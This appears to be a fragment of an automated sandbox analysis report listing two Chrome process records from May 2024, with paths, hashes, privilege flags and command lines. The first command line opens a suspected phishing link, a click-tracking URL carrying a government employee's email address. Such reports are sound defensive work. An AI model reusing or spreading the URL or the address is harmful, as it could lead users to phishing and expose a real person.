                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Target ID:8
                                                                    Start time:23:01:50
                                                                    Start date:23/05/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://qslprinting.us22.list-manage.com/track/click?u=a04bf63252457300eebd0f474&id=b79cb6befe&e=dfb5c8b714/#/?/anitha.pal@agedcarequality.gov.au
                                                                    Imagebase:0x7ff7f9810000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:10
                                                                    Start time:23:01:51
                                                                    Start date:23/05/2024
                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2016,i,1486018253116122347,5634552884418498544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x7ff7f9810000
                                                                    File size:3'242'272 bytes
                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    No disassembly